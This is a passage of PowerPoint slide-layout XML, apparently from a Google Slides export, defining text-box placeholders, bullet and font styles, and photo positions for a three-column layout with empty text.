            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="Google Shape;214;p22"/>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Columns_Photos">
  <p:cSld name="Custom Layout_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="215" name="Shape 215"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3436968" y="2873363"/>
            <a:ext cx="2270100" cy="1625100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="342900" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="685800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-63500" lvl="0" marL="127000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="900">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5908781" y="2873363"/>
            <a:ext cx="2270100" cy="1625100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="342900" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="171450">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="685800" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="965156" y="2873364"/>
            <a:ext cx="2270100" cy="1625100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="342900" lIns="171450" spcFirstLastPara="1" rIns="171450" wrap="square" tIns="171450">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440475" y="3385298"/>
            <a:ext cx="2263200" cy="1584000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5908819" y="3385298"/>
            <a:ext cx="2263200" cy="1584000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972131" y="3385298"/>
            <a:ext cx="2263200" cy="1584000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222" name="Google Shape;222;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="9" r="9" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="965152" y="1292170"/>
            <a:ext cx="2270019" cy="1513341"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="Google Shape;223;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="29" r="19" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3436972" y="1292170"/>
            <a:ext cx="2270017" cy="1513344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972056" y="2873364"/>
            <a:ext cx="2263200" cy="484500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr b="1" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
